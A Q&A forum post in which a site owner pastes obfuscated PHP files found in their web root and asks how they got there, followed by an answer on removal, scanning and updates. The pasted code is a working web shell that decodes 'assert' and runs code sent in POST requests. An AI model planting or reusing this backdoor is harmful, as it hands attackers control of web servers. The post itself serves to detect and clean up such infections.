# Hacker php file on my site?

Tags: php, webserver

I just noticed several php files in the root directory of my site that I didn't place there. They contain obfuscated code (see below) which translates into attempted get/post/assert statements. My question is whether other people have seen this, if it is a common hack, and how they might have been able to place it on the site?

````
 <?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["213d7"])&&isset($_POST["42df9"])){${${"\x47\x4cO\x42A\x4c\ x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x70xe\x62\x70c\x75"]}($_PO ST["42df9"]);exit();} ?><?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["c991d"])&&isset($_POST["bc05e"])){ ${${"\x47\x4cO\x42A\x4c\x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x7 0xe\x62\x70c\x75"]}($_POST["bc05e"]);exit();} ?><?php if (isset($_POST['b0e4d'])) {$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');$license($_PO ST['b0e4d']);}?>```
````

Answer (score 3, accepted):

Yes, it sounds your site have a malware.

Hackers can upload these files through the vulnerabilities or through already uploaded scripts which acts as file managers.

For example, if your site allows uploading any files (like images), they can try to upload a malware file to your site (using specially prepared images), then run it using weakness in your system (like directly accessing that file).

Read more:

- [Is it possible to embed a keylogger into a jpg image?](https://superuser.com/q/966551/87805)
- [How to inject executable, malicious code into PDF, JPEG, MP3, etc.?](https://security.stackexchange.com/q/8113/11825)

If you're using content management system, please make sure it is up-to-date all the time to avoid the risk.

To understand how that kind of malware files works, check: [What does this malicious PHP script do?](https://security.stackexchange.com/q/86094/11825)

---

So the next suggested steps are:

1. Find all malware files and remove them.

   See: [How to get rid of eval-base64_decode like PHP virus files?](https://stackoverflow.com/q/5922762/55075)

   You can use a malware scanners, e.g.

   - [Malware scanner for websites code?](https://softwarerecs.stackexchange.com/q/32138/3474)
   - [PHP security scanner](https://stackoverflow.com/q/3056150/55075)
2. If you're using dedicated server, upgrade all outdated packages on your system (`apt-get update`).
3. Upgrade outdated PHP libraries (3rd party code) and content management system (if in use).
4. Keep your 3rd party libraries and code up-to-date.